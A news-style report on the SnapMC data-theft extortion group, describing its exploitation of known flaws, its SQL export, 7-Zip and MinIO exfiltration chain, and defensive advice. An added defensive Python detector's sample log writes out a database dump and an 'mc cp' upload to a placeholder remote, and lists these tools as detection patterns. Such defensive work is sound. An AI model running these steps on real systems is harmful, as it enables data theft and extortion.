A new malicious group identified as SnapMC has appeared on the cybercrime scene, performing the data theft and extortion that underpins ransomware operations, but without encrypting any files.
File encryption is considered a key component of ransomware attacks, as it is the element that puts the most pressure on the victim.
Data theft for double-extortion purposes came later as an additional form of pressure, but it always ranked behind the chaos that encrypting a network could cause.
Ransomware attackers soon realized the power of this approach: many companies were able to recover damaged files from backups, but they could not undo the theft of their files or its consequences.
Researchers at NCC Group are tracking a new adversary called SnapMC, so named because the group breaks into networks, steals files and delivers extortion messages in under 30 minutes.
The SnapMC gang uses the Acunetix vulnerability scanner to find flaws in a target's VPN and web server applications, then exploits them to breach the corporate network.
The vulnerabilities most commonly exploited in the group's initial access attempts include PrintNightmare LPE, remote code execution in Telerik UI for ASP.NET, and various SQL injection attacks.
The actors use SQL database export scripts to steal data, and the resulting CSV files are compressed with the 7zip archiving utility before exfiltration. Once everything is ready, the MinIO client is used to send the data to attacker-controlled storage.
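The export, compress, upload sequence described above is something a defender can look for in process-creation telemetry. The following is an added example, not code from the article or from NCC Group: it parses a constructed, pipe-delimited process log and alerts on any host where a database export tool, a 7-Zip archive and a MinIO client run in that order within the 30-minute window the article mentions. The log format, timestamps and binary names (sqlcmd, 7z, mc) are assumptions made for illustration.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Assumed binary names for each stage of the chain described in the article.
# sqlcmd/bcp/mysqldump are common database export tools, 7z is the 7-Zip
# command line, mc is the MinIO client; the exact names are assumptions.
STAGES = {
    "export":   {"sqlcmd.exe", "bcp.exe", "mysqldump.exe", "sqlcmd", "mysqldump"},
    "compress": {"7z.exe", "7za.exe", "7z"},
    "upload":   {"mc.exe", "mc"},
}
STAGE_ORDER = ("export", "compress", "upload")

# Constructed process-creation log, pipe-delimited:
# <ISO timestamp>|<host>|<image path>|<command line>
# web-01 shows the full chain; db-02 is a routine backup (archive + upload
# with no database export) and must not alert.
SAMPLE_LOG = """\
2021-10-05T09:00:12|web-01|C:\\Windows\\System32\\svchost.exe|svchost.exe -k netsvcs
2021-10-05T09:01:03|web-01|C:\\Tools\\sqlcmd.exe|sqlcmd -S . -Q "SELECT * FROM customers" -o C:\\Temp\\out.csv
2021-10-05T09:04:41|web-01|C:\\Program Files\\7-Zip\\7z.exe|7z a C:\\Temp\\out.7z C:\\Temp\\out.csv
2021-10-05T09:06:20|web-01|C:\\Temp\\mc.exe|mc cp C:\\Temp\\out.7z <placeholder-remote>/bucket/
2021-10-05T22:00:00|db-02|C:\\Program Files\\7-Zip\\7z.exe|7z a D:\\backups\\nightly.7z D:\\backups\\nightly.bak
2021-10-05T22:30:00|db-02|C:\\Tools\\mc.exe|mc mirror D:\\backups <placeholder-remote>/backups/
"""


def parse_event(line):
    """Parse one log line into (timestamp, host, image basename, cmdline);
    returns None for malformed lines so a bad record never aborts the scan."""
    fields = line.rstrip("\n").split("|", 3)
    if len(fields) != 4:
        return None
    ts_text, host, image, cmdline = fields
    try:
        ts = datetime.fromisoformat(ts_text)
    except ValueError:
        return None
    basename = image.replace("\\", "/").rsplit("/", 1)[-1].lower()
    return ts, host, basename, cmdline


def stage_of(basename):
    """Map an image basename to its chain stage, or None if it is unrelated."""
    for stage, names in STAGES.items():
        if basename in names:
            return stage
    return None


def find_chain(events, window):
    """Given one host's sorted (timestamp, stage) events, return the (first,
    last) timestamps of the earliest export->compress->upload sequence that
    completes inside `window`, or None if there is no such sequence."""
    for i, (t0, s0) in enumerate(events):
        if s0 != "export":
            continue
        wanted = 1          # index into STAGE_ORDER of the next stage needed
        last = t0
        for ts, stage in events[i + 1:]:
            if ts - t0 > window:
                break       # this export is too old; try the next export
            if stage == STAGE_ORDER[wanted]:
                last, wanted = ts, wanted + 1
                if wanted == len(STAGE_ORDER):
                    return t0, last
    return None


def detect_chain(lines, window_minutes=30):
    """Return [(host, first_ts, last_ts)] for every host on which the
    export -> compress -> upload chain completes within window_minutes."""
    window = timedelta(minutes=window_minutes)
    by_host = defaultdict(list)
    for line in lines:
        parsed = parse_event(line)
        if parsed is None:
            continue
        ts, host, basename, _cmdline = parsed
        stage = stage_of(basename)
        if stage is not None:
            by_host[host].append((ts, stage))
    alerts = []
    for host, events in sorted(by_host.items()):
        hit = find_chain(sorted(events), window)
        if hit is not None:
            alerts.append((host, hit[0], hit[1]))
    return alerts


if __name__ == "__main__":
    for host, first, last in detect_chain(SAMPLE_LOG.splitlines()):
        print(f"ALERT {host}: export->compress->upload between {first} and {last}")
```

Matching on image names alone is deliberately simple; in production the same ordered-sequence logic would key on signed-binary hashes or command-line arguments rather than file names, since an attacker can rename a tool, and the routine backup on db-02 shows why the database export stage is required before an archive-and-upload pair is treated as suspicious.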
Since SnapMC exploits known vulnerabilities for which patches already exist, keeping software up to date is the most direct way to protect against this growing threat.
As the NCC team points out in its report, even if an organization runs a vulnerable version of Telerik, placing it behind a well-configured web application firewall would make any exploitation attempt futile.
In data-theft extortion attacks, meeting the threat actor's ransom demands guarantees nothing. Instead, it could give the attackers an incentive to attempt further extortion in the future.
Even if a victim pays the ransom, the data may still end up being sold on criminal markets or forums as an additional source of revenue for the attackers.
The ransomware negotiation firm Coveware strongly advises its customers never to pay a ransom in an attempt to prevent stolen files from being leaked.
In cases it has negotiated in the past, victims who paid a ransom still had their data leaked, or were never given proof of deletion.
Because of this, victims should assume that their data has been shared with other threat actors and that it will be used or leaked in the future, regardless of whether they have paid a ransom.